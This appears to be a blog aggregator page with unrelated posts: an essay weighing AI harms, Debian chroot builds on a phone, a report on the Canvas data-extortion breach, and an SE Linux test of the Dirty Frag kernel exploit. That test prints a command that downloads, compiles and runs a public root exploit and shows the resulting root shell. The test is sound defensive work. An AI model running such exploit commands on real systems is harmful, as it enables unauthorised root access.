The US CDC has an informative article about youth suicide [6] which documents it as the 3rd largest cause of death in the 14-18 age range for 2021. This article was published in 2024 and based on statistics from 2023 and earlier. It notes significant differences in suicides, attempts, and “persistent feelings of sadness or hopelessness”, which had girls at more than twice the rate of boys and “LGBQ+” kids at more than twice the rate of “heterosexual” students. It seems obvious that misogyny and homophobia are correlated with suicide, and that's something that could and should be addressed in schools. My state has a Safer Schools program [7] to try and alleviate the problems related to homophobia, but I expect that things are getting worse in the US in that regard. 39.7% of kids in US high schools had “persistent feelings of sadness or hopelessness” before LLMs became popular; school could and should be a happy time for the vast majority of kids, but instead almost half of the kids don't enjoy it, and a majority of girls and “LGBQ+” kids don't. Having no mention of trans kids is a significant omission from that article; based on everything I've heard from trans people I expect that their statistics would be even worse.

One could argue that the small number of deaths inspired by use or misuse of LLMs is an indication of a larger number of people suffering in ways that don’t result in death and don’t get noticed. But I don’t think that can compare to the fact that the majority of girls and “LGBQ+” kids have “persistent feelings of sadness or hopelessness” in the current school system.

Regarding homicide, the Australian Institute of Criminology has an article showing that in the 2003-2004 time period the deaths of 49% of women who were killed were attributed to a “domestic argument” [8]; that's something that could and should be addressed. That article claimed 308 homicide victims in that time period, which is larger than the world-wide death toll from LLMs but also less than 1/3 the death toll from car accidents in Australia. Australia has less than 0.4% of the world population, a fairly low homicide rate, and a number of homicides that vastly outnumbers all world homicides related to LLMs.

I think it’s great to address any cause of suicide or homicide, but devoting government resources and legislation towards very uncommon causes instead of things that happen every day is not a good strategy. It would be fine to address all factors leading to suicide, but problems with the school system have been a major factor for decades with little effort applied to fix it.

Fraud and Other Crime

There is evidence of criminals using LLMs to help prepare for crimes; the ability to generate large amounts of text quickly can be used for fraud and extortion. This is going to be a serious problem and we need structural changes to society to deal with it. There is an ongoing issue of scammers convincing older people that their child or other young relative is in trouble and that a large amount of cash is required to address it. This sort of scam, as well as the more well known “Nigerian” scams, will probably become more common as the cost of running them decreases. This may be more of a problem for people in developing countries, as currently a common scam business model is to have people in regions where wages are low (such as Pakistan, in the case of one scammer I spoke to) scamming people in relatively wealthy countries like Australia, so an attack with a low probability of success is financially viable. Cheaper attacks will make less affluent victims financially viable to the scammers.

While writing this post I received a financial scam phone call trying to get me to invest in SpaceX that was run by an “AI” chat system, I expect to receive more of them and this is something that needs to be dealt with via both technical measures and legislation.

Do we have to accept less freedom and less anonymity in finances as a cost of reducing financial crime? Greater restrictions on the use of cash would make some crimes more difficult or less profitable for criminals. As a society I think we need to have a discussion about a balance between financial freedom and freedom from criminal exploitation, failing to have such a discussion is likely to lead to policies which don’t work well.

Also one thing that ML systems are good at is recognising patterns in data. Banks could scan all their transactions and look for patterns that correlate with fraud. They currently do this badly and do things like locking credit cards when someone goes to another country and spends money. They could do a better job of that and involve the police in cases of obvious fraud even when the customer doesn’t realise that they are a victim.

This isn’t a reason to criticise “AIs”, it’s a reason to plan defensive technology that matches the capabilities of attackers.

As an aside I used to work for a company that was developing “AI” software to scan bank phone calls and allow banks to recognise employees who acted illegally. Unfortunately the Royal Commission into banking misconduct [9] didn’t impose any penalties that gave the banks a financial reason to avoid criminal activity.

Unemployment and Inequality

There are many claims about AI systems making large numbers of jobs obsolete; some of them are outlandish, such as the claims that all white-collar jobs will be obsolete in the near future. There are some reasonable claims, like the ability to replace some mundane jobs.

Replacing jobs that suck with computers, robots, and other machinery is a good thing! Very few people wish that they were working on a farm without a tractor. In 1900 it’s estimated that between 60% and 70% of the world labour force worked in agriculture and 40% of the US labour force did so. Now it’s something like 27% globally and between 1% and 3% in developed countries. Automated factories are also a good thing, it’s best to avoid boring and dangerous work.

The most plausible claims about job replacement from “AI” concern jobs that involve analysing and summarising documents. One example that comes to mind is the worst kind of journalism, where press releases from companies are massaged into the format of a feature article. I don't think anyone wants that sort of job, and doing it with “AI” hopefully means no human has to sign their name to it.

For work like programming few people will be directly replaced by “AI”, but if people can do their work more efficiently while using it then fewer people are required. I don't think that any programmer likes the part of their job where they have to skim read long documents looking for a clue about how to solve a problem with a library or protocol. An LLM processing the document and finding the potentially useful things will take away the drudgery from the work and allow greater productivity.

One trend in replacing people has been making the remaining people work longer. If you force all employees to work 60 hour weeks then that can theoretically allow hiring fewer people than having 40 hour weeks. For some work that applies, but for skilled work it mostly doesn't, as productivity and work quality on average drop when people work more than 40 hours in a week.

Another trend for exploiting people is having a low minimum wage and making accommodation expensive so that many people need to work two jobs. What we need is legislation to restore the situation in the 70s where a single full time job was sufficient to provide for a family. The low minimum wage and high expenses for many things is a problem that’s been slowly developing over the course of decades while being mostly ignored by journalists. If they could concentrate on the real issues that are hurting workers today they could incite political action to fix these problems.

Academic Cheating

There is no shortage of ways of cheating in school and university. There are people who are paid to write essays, mobile phones are used for cheating in exams, etc. Getting an “AI” to write essays makes it easier to cheat for the essay writing part but does so with lower quality and in a less stealthy way.

What’s the worst case scenario? That we have to change to oral exams for all university subjects?

In the US the average annual price for tuition at a university is apparently $25,000. If each student had individually supervised assessment for their exams at a cost of $100 per hour, then ten hours of supervision per year would add $1,000, making the degree cost about 4% more. The cost of university in the US is unreasonably high and that's a problem that needs to be fixed, but a hypothetical case of increasing the price by 4% isn't going to be a major part of it.

Weak Arguments Against “AI”

Computer Security Attacks

There have been many claims made that “AI” will break the security of all systems and cause the type of disruption that was previously predicted for the year 2000. Bruce Schneier has written a good analysis of the issues, including how “AI” can be used by both attackers and defenders [10]; he doesn't have a strong conclusion on whether the net result will be good or bad, but his article does make it clear that the result is not going to be a total disaster.

While I was working on this post I read another post by Bruce Schneier that was significantly more negative about this issue [11]. While I still don’t think this will destroy civilisation I found his other post convincing enough to move computer security from the bad argument section to the weak argument section.

Spidering the Web to Death

There are issues of bots from “AI” companies doing a bad job of trying to download all the Internet's content and using a lot of resources. When it was just the major search engines and the Wayback Machine doing it the load was small, because a small number of organisations were doing it very well, having evolved their practices over many years. Now we have a lot of idiots doing it badly and repeatedly hitting generated content.

This is really annoying but is something that we can deal with. Currently my blog and many other sites are hosted on a Hetzner server with an E3-1271 v3 CPU and 32G of RAM, and there are occasions where more than half the CPU power is being used to service web requests from such systems. Even on the “server bidding” market (renting servers previously used by other customers) Hetzner isn't offering systems that slow nowadays; the slowest they offer is about 20% faster than that. This is something that can be dealt with by spending a little more on hosting until the companies doing that go bankrupt.

I’m sure this is a serious problem for some people, but for most people it’s not a big deal. Also hostile traffic on the Internet is something we have all had to deal with as a part of life since the mid to late 90s.

RAM Prices

The unreasonably high prices for RAM are annoying and hurt the development of useful computer projects. Big companies can afford it, even with current high prices and large quantities of RAM used for some servers it’s still not significant. But it is a major issue for hobbyists and small projects. Things like setting up a dozen test VMs for FOSS development are now too expensive for many people who develop software in their spare time.

But this is a temporary thing: if AI companies were to keep buying RAM at high rates for a few years, manufacturers would just produce more of it to meet demand. In some situations capitalism can work.

Environmental Damage

There are many people claiming that power used by data centers for “AI” will lead to environmental damage, using power and water when there isn’t enough.

The trend of computer hardware is to get smaller and faster. It hasn’t been going as fast as it used to in many areas but it hasn’t stopped either and it’s an exponential trend. There has been an increase in data centers (DCs) for “AI” use as the use has been increasing faster than the hardware gets smaller. Eventually they will stop increasing faster than advances in hardware and software can match and the size of DCs will decrease.

As the production of renewable energy increases, the environmental cost of energy-hungry industries decreases. In a few years this won't be an issue anyone is bothered about.

False Claims About Danger as PR

Jamie McClelland makes an interesting claim that the AI companies are pushing dangers of “AI” as a method of PR [12]. That seems plausible and combined with the tendency of many journalists to just massage press releases from companies into articles could be the reason for a lot of the bad arguments against AI.

Good Arguments Against AI

Spam Everywhere

I’ve previously written about Communication and Hostile AIs [13]. I think that filling all communication channels with rubbish is a denial of service attack against society.

In the past communication took some effort; even the simplest email that was directly targeted at the recipient took some human effort, and that reduced its frequency. I get a lot of spam saying something like “I see your web site doesn't rank in the top for Google searches” while my web site in fact ranks well and the actor named Russell Coker ranks below me, so I know that such spam hasn't had even the minimum of human involvement. Now a spammer who wanted to do a better job could get LLM-written spam for every target, so the message would be specifically aimed at them, would take much longer for a human to recognise as spam, and would also avoid most anti-spam software.

Searching for businesses used to be easy, the phone book had listings for them and there was a real cost to being in the book as well as humans actively trying to stop fraud. Creating fake web sites to get business isn’t too difficult but it’s also not trivial at the moment and such fake sites won’t look complete. Now with LLMs it’s possible to create hundreds of sites that have content and look reasonable without human involvement. Instead of the small number of suicides and homicides inspired by “AI” chat systems we should probably be concerned about people who need psychological or medical advice being misled by bogus web sites created as part of fraud campaigns. Imagine people searching for mental health assistance finding web sites run by cults who oppose psychology as a profession. Imagine people searching for basic medical advice such as how to cook a healthy meal getting sucked in to web sites that start sane and then lead people to Ivermectin as a universal medicine.

LLMs have the potential to take spam from quick and simple attacks to large scale targeted fraud aimed at people and organisations that don’t have the resources to defend against it. There have been many reports of CEO impersonation fraud against major corporations aiming to steal hundreds of thousands of dollars and fraud against individuals who are persuaded to get amounts like $50,000 to help a relative who is allegedly in a difficult situation. But if every corner store experienced the same type of attack that CEOs experience and if every child had someone trying to steal the pocket money in the same way that relatively wealthy people are being targeted now it would really change things.

David Brin wrote an insightful and informative blog post about this focusing on how “AI” generated content is being allowed to destroy YouTube [14].

Deep Fakes

There is some overlap between filling all communications channels with rubbish (fake news etc) and deep fakes. Making a fake photo of a politician or celebrity to lobby for legislative changes is a real issue, but it's not what most people think of when the term “deep fake” is used.

Photo and video fakes targeting non-consenting people are a serious issue. It's not just fake porn (which is a major issue and will cause some suicides), as there are many other possibilities. Fake videos showing behaviour that justifies sacking people from their jobs are going to become an issue, and for people in public facing positions even proof that the videos are fake won't necessarily help them.

Will we find ourselves in a situation where every politician gets deep-fake porn made of them and the only people who run for public office are ones who are cool with that? Will positions of leadership in the technology industry be restricted to people who aren’t bothered by having the most depraved fake porn made of them?

The Justice System

We have seen a lot of evidence of bias in law enforcement and the court system leading to bad results. The Innocence Project attempts to correct that, and its web site documents some of the things that have gone wrong [15]. Using “AI” systems to do some of the work of law enforcement by training computers on the flawed results of current systems can entrench bias and also make it harder to spot.

When determining whether someone should be considered a suspect or whether a prisoner should be eligible for parole, the number of factors that a human can use is limited. But a computer can take many more factors into account, so the issue of whether inappropriate factors are being used can be masked. Computers are also unable to explain the decisions that they made, while being better at coming up with convincing fake reasons.

In the past there have been racist policies in the US about banks not lending to people living in suburbs where most houses were owned by non-white people; these policies were documented, and the documents have become part of the historical record showing racist policies. If an LLM decides not to lend money to people based on mathematical correlations it determined from historical banking practices, it could assign negative weights to factors such as non-English names and implement the racism in a large array of numbers with no proof.

The current cases of lawyers getting LLM systems to do some of their work and having their incompetence revealed when the computer-generated work is shown to be ridiculously bad are amusing. But that is not the real problem. The real problems will start when the computers in police cars start flagging every car owned by a non-white person as having a “probable cause” for a drug stop.

Technically Not Financial Fraud

The majority of the ecosystem around “AI” is a financial scam [16]. There are companies and individuals doing good things with machine learning, some of which is based on hardware and software developed as part of this ecosystem. But the majority of it has no plausible path to profits, and the future of it inevitably ends with some bankruptcies. There are circular flows of money that have the major cloud providers and NVidia looped in; when the values of these companies correct it will become apparent that they have all burned a lot of money keeping this running and all the senior people have taken a share of it (the entire purpose of stock options is to allow senior people to suck money out of the company). Then every cloud provider will increase costs while under Chapter 11, and all the companies that depend on them will pay whatever it takes. That includes all major companies and most governments. Unlike the dot-com boom and crash and the housing crash, the coming financial crash will impact every company that we deal with and most governments. So the people in first-world countries will effectively be taxed to pay for this scam while the executives go party in Monaco. This may seem like an extreme claim, but it all happened before with the dot-com crash and the housing market crash.

The CEO class has an ongoing practice of doing things that aren’t crimes because they lobby (bribe) politicians to make them legal. So the current stock market shenanigans around “AI” don’t seem to involve things that governments consider to be crimes. But any normal person might be surprised to learn that such things are legal and most people would vote for such things to be crimes if they had the opportunity.

A global financial crisis is the least of the problems that seem likely to afflict society from “AI” systems. But it will be more immediately obvious when it happens – which could be this year!

Propaganda

Creating art requires skills that the type of people who want to create propaganda tend to lack. “AI” technologies allow creating “art”, based on mathematical models of actual art, tailored to the requirements of the person running the program.

I have seen the term “AI Fascism” used to describe the use of “AI” to help authoritarian governments. I am dubious about whether it deserves that term; while every article I’ve read about the topic has made some good points, I thought the arguments were weak overall.

But there are lots of ways that governments can abuse their populations without going full fascist. In the last century there were lots of truly terrible governments that didn’t even make the top 10 of fascism.

AI Sycophants

Bruce Schneier wrote an informative blog post about AI Chatbots and Trust which focused on sycophantic chatbots [17]. We have seen a lot of evidence of terrible behaviour and stupid decisions from rich people due to having no negative consequences for bad choices. The vast majority of the history of kings concerns bad decisions made by such people. A future where middle class and poor people can make the same bad decisions as rich people wouldn’t be good.

Good Things About ML

Machine Learning (abbreviated as ML) can do useful things. It’s not just Large Language Models (LLMs) such as ChatGPT etc. There are also ML systems that can analyse images and other data sets.

I have found ChatGPT to be very useful for making suggestions for improving blog posts. I don’t get it to write anything, I just ask for suggestions. It has pointed out things that I missed, such as when I didn’t include the price when reviewing a car because the car in question was much more expensive than I will ever pay; the price wasn’t relevant to me but would be to some readers. It has also made useful suggestions about the structure of blog posts, repeating points, and having a good conclusion. It has some downsides, which include trying to erase my voice from my writing, such as suggesting that the rhetorical question “does email suck?” is unprofessional.

I have worked for a company that used ML systems to analyse driver performance and alert people if a driver is falling asleep, using a phone, or otherwise seems unable to drive safely. Their business model involved a human reviewing the images from the drivers the computer flagged and then determining who was actually doing the wrong thing. This seems like a good use of the technology.

I have also worked for a company that used ML systems to analyse the performance of bank employees and detect potentially fraudulent behaviour. Preventing crime seems to be clearly a good thing and in this case the manager of the employee in question would review the evidence to make sure that they weren’t being falsely accused.

Conclusion

I don’t think that the problems with managing the changes that so called “AI” is introducing are particularly new. An example of how society handles change that’s worth considering is car safety. The seat belt first became mandatory for aeroplanes in some jurisdictions in 1928. The Model T Ford is widely regarded as the first vehicle to start a mass market for cars and it was released in 1908. So if society acted in a reasonable way then seat belts would have been a standard feature for the majority of the mass-market car era. However seat belts were first made compulsory in 1970 in Victoria, Australia, and there are still people who think that they are safer without seat belts! The delay in adoption of car seat belts is only one example of needless deaths caused by not taking reasonable measures for car safety, but it’s one that’s easy to demonstrate and measure.

The difference between past problems like car safety and the current problems of “AI” is that the “AI” problems will be more pervasive. Most of my history as a car driver and car passenger was in cars that are much less safe than cars made in the last 10 years. But partly through luck I’ve never been in a serious crash, so being in cars that would have given me a low probability of surviving a freeway speed crash didn’t affect me. There is no possibility that through any combination of luck and skill someone could avoid the downsides of “AI”. If nothing else the results of elections will be affected and no-one can avoid that.

As a society we really need to address the real issues related to “AI” which in some cases requires legislation.

MESystemd, Mobile Linux, and Containers

I’ve had some problems running apps I want on my Furilabs FLX1s [1], so I decided to install some container environments to test various versions. I started with Debian/Testing so I can test the build process for some packages I’m about to upload to Unstable.

Systemd Issues

When running debootstrap testing testing to set up the chroot, the process aborted with errors including the following from the systemd postinst:

Failed to enable units: Protocol driver not attached.
Cannot open '/etc/machine-id': Protocol driver not attached

This turned out to be from trying to run systemctl in the postinst. I just removed the “set -e” line from /chroot/testing/var/lib/dpkg/info/systemd.postinst and kept on going (I’m not planning to actually use systemd so its failure to set up wasn’t a problem).

Then I installed a bunch of -dev packages needed to build my package, which had a dependency chain that included udev, leading to the following error:

Setting up udev (260.1-1) ...
Failed to chase and open directory '/etc/udev/hwdb.d', ignoring: Protocol driver not attached
Failed to chase and open directory '/usr/lib/udev/hwdb.d', ignoring: Protocol driver not attached

Udev is also a part of systemd.

Googling for this turned up a closed systemd bug indicating that systemd has a minimum kernel version of 5.10 [2]. The Furiphone has kernel 4.19.325-furiphone-radon due to being based on Android.

Checking the kernel version isn’t that hard to do; if the systemd programs in question checked the version and reported “can’t run on kernels prior to 5.10” then it would avoid a lot of confusion – and also bug reports that the systemd developers don’t want.
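
To illustrate the point, here is a minimal sketch of the kind of check being suggested, written as shell; the error message wording is my own and 5.10 is the minimum version from the bug report above:

min=5.10
cur=$(uname -r | cut -d. -f1-2)
# if the smaller of the two versions isn't the minimum, the running kernel is too old
if [ "$(printf '%s\n' "$min" "$cur" | sort -V | head -n1)" != "$min" ]; then
    echo "this program requires a kernel >= $min, but this system is running $cur" >&2
    exit 1
fi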

Some Debian package dependencies can probably do with revision. Installing the packages “libkdb3-dev libkf5archive-dev qtdeclarative5-dev qtpositioning5-dev qttools5-dev” ideally wouldn’t have a dependency chain leading to udev.

The Furilabs people appear to have patched the latest Debian version of systemd to work with the older kernels; the version is currently 260.1-1+furios0+git20260425023744.8401044.forky.production.

Compile Times

I got this working by just editing every postinst script and either removing the “set -e” or adding an “exit 0” at the top. I don’t need things to be configured properly for a running OS, I just need the files in the right locations for a container.
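
As a rough illustration (these are not the exact commands from this post), something like the following would neutralise all the postinst scripts in the chroot; the chroot path is the one used above, and inserting an exit after the shebang makes each script succeed without doing anything:

for script in /chroot/testing/var/lib/dpkg/info/*.postinst; do
    # append "exit 0" after line 1 (the shebang) so the script exits successfully
    sed -i '1a exit 0' "$script"
done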

One issue I discovered when I started compiling is that the build was only running on 1 core and the “nproc” program was returning “1”. The “lscpu” program showed that only 1 of the 8 cores was online, a single Cortex-A78 core. Some combination of putting it in “caffeine mode” and having the screen on enabled all 6*Cortex-A55 and 2*Cortex-A78 cores.
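
For reference, here is a minimal sketch of how to check which cores the kernel considers online and how one might try to bring one up manually; the sysfs paths are standard, but the specific core number is just an example and the platform may refuse the request:

# list the CPUs that are currently online
cat /sys/devices/system/cpu/online
lscpu | grep -i 'on-line'
# attempt to bring core 7 online (run as root)
echo 1 > /sys/devices/system/cpu/cpu7/online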

The table below compares compiling Harbour-Amazfish on the Furiphone with all 8 CPU cores active, on my E5-2696 v4 workstation (almost the fastest socket 2011-3 CPU ever made), under ARM64 software emulation on a system with two E5-2699A v4 CPUs, and on a Radxa 8 core ARM SBC (which I will review in a future blog post).

Given that the source apparently limits the parallelism to less than 7 cores on average, it’s pretty impressive for the elapsed time to be only 2.5* longer on the phone. Emulating the ARM64 build at about 4* the CPU time is impressive too; as that system has 4.5* as many CPU cores it could theoretically compile ARM code faster than the native ARM hardware I own for any project that uses enough cores.

System                        User time   System time   Elapsed    %CPU
Furiphone                     2252.76     164.51        7:00.88    574
E5-2696 v4 workstation        679.64      119.07        1:58.63    673
2*22core Intel CPUs (qemu)    8476.65     113.14        10:24.57   1375
Radxa                         2011.45     239.40        6:25.55    583

365 TomorrowsBeliefs

Author: Harold Loomis The coffee shop’s windows were broken and decades of dust lay on the floor. Coffee had not flowed here since the eradication. Nobody was around to use it after that. The door creaked on its rusty hinges as the silent fluid-servo driven hand gave it a push. It was 5.71 meters tall, […]

The post Beliefs appeared first on 365tomorrows.

,

Cryptogram Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia

Evidence of them has been found by analyzing DNA in the seawater.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Cryptogram Insider Betting on Polymarket

Insider trading is rife on Polymarket:

Analysis by the Anti-Corruption Data Collective, a non-profit research and advocacy group, found that long-shot bets—defined as wagers of $2,500 or more at odds of 35 percent or less—on the platform had an average win rate of around 52 percent in markets on military and defense actions.

That compares with a win rate of 25 percent across all politics-focused markets and just 14 percent for all markets on the platform as a whole.

It is absolutely insane that this is legal. We already know how insider betting warps sports. Insider betting warping politics—and military actions—is orders of magnitude worse.

Worse Than FailureError'd: Null Null Null

The single most common category of entries for this column is failed handling of NaN, null and undefined. Almost exclusively from javascript in web pages, sometimes in node servers, and almost never any other languages or frameworks. They're getting a bit repetitive but it's our solemn duty to call out failure where we find it. So if you send us one of these, make sure it identifies the source!

"If you want something you've never had, do something you've never done" exhorted Ben.

"Dashed Hope for Jennifer Null," titled an entry from some guy[sic]. "As recently linked from TDWTF article "Not for Nullthing", not only names can break computer systems, but also article content." Stretching, but we'll allow it.

"Where does Batman go on holiday?" asked Morgan. "Nananananana... Nowhere!"

"UBER is ready for driverless vehicles..." Bruce C. "Uber is getting so big, they can't even keep track of their driver's names."

"Well at least the reason wasn't null or NaN," wrote Steve W. regarding CenturyLink. "I've been trying for weeks to use their web page to change my (incorrect billing address). Such progress."

Additional entries on the topic from
Dan : "we're fresh out of null"
Henrik : "What is this null music streaming service"
Mike : "Name: undefined"
Laks : "In this app, every new user defaults to a nullptr."
and
Jim : "Think I'll buy $NaCar with this refund!"
and many others were all appreciated and noted.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

365 TomorrowsYour City

Author: Philip G Hostetler You’re in a city, it’s not that it’s deserted or abandoned, it’s that it’s been built entirely for you. It’s completely devoid of vehicles, people and animals though all of your needs and desires were present, just lying in wait. You passed by an empty coffee shop, you wanted to smell […]

The post Your City appeared first on 365tomorrows.

MEDirty Frag on Debian and SE Linux

Hot on the heels of the Copy Fail vulnerability [1] there is a new vulnerability, Dirty Frag [2] (I linked to the Alma Linux page because it’s the first one I saw and it explains things well).

The Test System

The test system was running kernel 6.19.14+deb14-amd64 and had the configuration left over from my last test of Copy Fail, which was a default configuration with the following commands run:

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
semanage login -m -s root -r s0 root
# logout and login again
semodule -X 100 -r unconfined

Strict Policy is Not Vulnerable

I did a quick test on a Debian SE Linux system with a user running as user_t (which is often referred to as “strict policy”) and got the following result:

test@testing1:~/t$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 11.47 MiB/s, done.
Resolving deltas: 100% (9/9), done.
dirtyfrag: failed (rc=1)
test@testing1:~/t/dirtyfrag$ ./exp 
dirtyfrag: failed (rc=1)

I checked the audit log and saw the following:

# audit2allow -al
#============= user_t ==============
allow user_t self:rxrpc_socket create;
allow user_t self:user_namespace create;

It seems that the rxrpc_socket access is the main thing.

I did a search for domains permitted to use that class on a system without unconfined domains and saw the following:

# sesearch -A -c rxrpc_socket
allow daemon init_t:rxrpc_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:rxrpc_socket getattr;
allow sosreport_t domain:rxrpc_socket getattr;
allow sysadm_t domain:rxrpc_socket getattr;

This configuration doesn’t appear to be vulnerable, at least to this form of the attack.

Unconfined Domains

I reinstalled the unconfined policy and assigned it to the user test2 with the following commands:

semodule -X 100 -i /usr/share/selinux/default/unconfined.pp.bz2
semanage login -a -s unconfined_u test2
restorecon -R -v -F /home/test2

I then tested the exploit as user test2 and got the following result:

test2@testing1:~$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 16.57 MiB/s, done.
Resolving deltas: 100% (9/9), done.
# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# 

The kernel message log had the following lines from the time of the attack:

[ 1310.861545] Initializing XFRM netlink socket
[ 1310.909048] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni))
[ 1310.909935] alg: No test for echainiv(authencesn(hmac(sha256),cbc(aes))) (echainiv(authencesn(hmac-sha256-lib,cbc-aes-aesni)))
[ 1318.353602] process 'su' launched '/bin/sh' with NULL argv: empty string added

Conclusion

It seems that we will be getting a lot of these, so running SE Linux users as user_t is the right thing to do for servers and multi-user systems.

xkcdCrystal Gazing

Krebs on SecurityCanvas Breach Disrupts Schools & Colleges Nationwide

An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service’s login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.

A screenshot shared by a reader showing the extortion message that was shown on the Canvas login page today.

Canvas parent firm Instructure responded to today’s defacement attacks by disabling the platform, which is used by thousands of schools, universities and businesses to manage coursework and assignments, and to communicate with students.

Instructure acknowledged a data breach earlier this week, after the cybercrime group ShinyHunters claimed responsibility and said they would leak data on tens of millions of students and faculty unless paid a ransom. The stated deadline for payment was initially set at May 6, but it was later pushed back to May 12.

In a statement on May 6, Instructure said the investigation so far shows the stolen information includes “certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as messages among users.” The company said it found no evidence the breached data included more sensitive information, such as passwords, dates of birth, government identifiers or financial information.

The May 6 update stated that Canvas was fully operational, and that Instructure was not seeing any ongoing unauthorized activity on their platform. “At this stage, we believe the incident has been contained,” Instructure wrote.

However, by mid-day on Thursday, May 7, students and faculty at dozens of schools and universities were flooding social media sites with comments saying that a ransom demand from ShinyHunters had replaced the usual Canvas login page. Instructure responded by pulling Canvas offline and replacing the portal with the message, “Canvas is currently undergoing scheduled maintenance. Check back soon.”

“We anticipate being up soon, and will provide updates as soon as possible,” reads the current message on Instructure’s status page.

While the data stolen by ShinyHunters may or may not contain particularly sensitive information (ShinyHunters claims it includes several billion private messages among students and teachers, as well as names, phone numbers and email addresses), this attack could hardly have come at a worse time for Instructure: Many of the affected schools and universities are in the middle of final exams, and a prolonged outage could be highly damaging for the company.

The extortion message that greeted countless Canvas users today advised the affected schools to negotiate their own ransom payments to prevent the publication of their data — regardless of whether Instructure decides to pay.

“ShinyHunters has breached Instructure (again),” the extortion message read. “Instead of contacting us to resolve it they ignored us and did some ‘security patches.'”

A source close to the investigation who was not authorized to speak to the press told KrebsOnSecurity that a number of universities have already approached the cybercrime group about paying. The same source also pointed out that the ShinyHunters data leak blog no longer lists Instructure among its current extortion victims, and that the samples of data stolen from Canvas customers were removed as well. Data extortion groups like ShinyHunters will typically only remove victims from their leak sites after receiving an extortion payment or after a victim agrees to negotiate.

Dipan Mann, founder and CEO of the security firm Cloudskope, slammed Instructure for referring to today’s outage as a “scheduled maintenance” event on its status page. Mann said Shiny Hunters first demonstrated they’d breached Instructure on May 1, prompting Instructure’s Chief Information Security Officer Steve Proud to declare the following day that the incident had been contained. But Mann said today’s attack is at least the third time in the past eight months that Instructure has been breached by ShinyHunters.

In a blog post today, Mann noted that in September 2025, ShinyHunters released thousands of internal University of Pennsylvania files — donor records, internal memos, and other confidential materials — through what the Daily Pennsylvanian and other outlets later determined was, in part, a Canvas/Instructure-mediated access path.

“Penn was the named victim,” Mann wrote. “Instructure was the mechanism. The incident was treated as a Penn-specific story by most of the national press and quietly handled by Instructure as a customer-specific matter. That framing was wrong then. It is dramatically more wrong in light of the May 2026 events, which now look like the planned escalation of an attack pattern that ShinyHunters had been working against Instructure’s environment for at least eight months prior. The September 2025 Penn breach was the proof of concept. The May 1, 2026 incident was the production run. The May 7, 2026 recompromise was ShinyHunters demonstrating publicly that the May 2 ‘containment’ did not happen.”

In February, a ShinyHunters spokesperson told The Daily Pennsylvanian that Penn failed to pay a $1 million ransom demand. On March 5, ShinyHunters published 461 megabytes worth of data stolen from Penn, including thousands of files such as donor records and internal memos.

ShinyHunters is a prolific and fluid cybercriminal group that specializes in data theft and extortion. They typically gain access to companies through voice phishing and social engineering attacks that often involve impersonating IT personnel or other trusted members of a targeted organization.

Last month, ShinyHunters relieved the home security giant ADT of personal information on 5.5 million customers. The extortion group told BleepingComputer they breached the company by compromising an employee’s Okta single sign-on account in a voice phishing attack that enabled access to ADT’s Salesforce instance. BleepingComputer says ShinyHunters recently has taken credit for a number of extortion attacks against high-profile organizations, including Medtronic, Rockstar Games, McGraw Hill, 7-Eleven and the cruise line operator Carnival.

The attack on Canvas customers is just one of several major cybercrime campaigns being launched by ShinyHunters at the moment, said Charles Carmakal, chief technology officer at the Google-owned Mandiant Consulting. Carmakal declined to comment specifically on the Canvas breach, but said “there are multiple concurrent and discrete ShinyHunters intrusion and extortion campaigns happening right now.”

Cloudskope’s Mann said what happens next depends largely on whether Instructure’s customers — the universities, K-12 districts, and education ministries paying for Canvas — choose to apply pressure or absorb the breach quietly.

“The history of education-vendor incidents suggests the path of least resistance is the second one,” he concluded.

Update, May 8, 11:05 a.m. ET: Instructure has published an incident update page that includes more information about the breach. Instructure said its Canvas portal is functioning normally again, and that the hackers exploited an issue related to Free-for-Teacher accounts.

“This is the same issue that led to the unauthorized access the prior week,” Instructure wrote. “As a result, we have made the difficult decision to temporarily shut down Free-for-Teacher accounts. These accounts have been a core part of our platform, and we’re committed to resolving the issues with these accounts.”

Instructure said affected organizations were notified on May 6.

“If your organization is affected, Instructure will contact your organization’s primary contacts directly,” the update states. “Please don’t rely on third-party lists or social media posts naming potentially affected organizations as those lists aren’t verified. Instructure will confirm validated information through direct outreach to all affected organizations.”

Update, May 11, 10:16 p.m. ET: Instructure posted an update saying they paid their extortionists in exchange for a promise to destroy the stolen data. “The data was returned to us,” the update reads. “We received digital confirmation of data destruction (shred logs). We have been informed that no Instructure customers will be extorted as a result of this incident, publicly or otherwise.”

Planet DebianDaniel Baumann: Debian: Linux Vulnerability Mitigation (Dirty Frag)

After Copy Fail [CVE-2026-31431] from last week, the new Linux local root privilege escalations of today are Dirty Frag (Part 1) aka Copy Fail 2 [CVE-2026-43284] and Dirty Frag (Part 2) [CVE-2026-43500].

For those who cannot update to linux >= 7.0.4-1, which was uploaded to sid and contains the needed fixes (backports for trixie are available in trixie-fastforward-backports), who are waiting for backports and updates to older Debian releases, or who can’t reboot on short notice, mitigations might be needed.

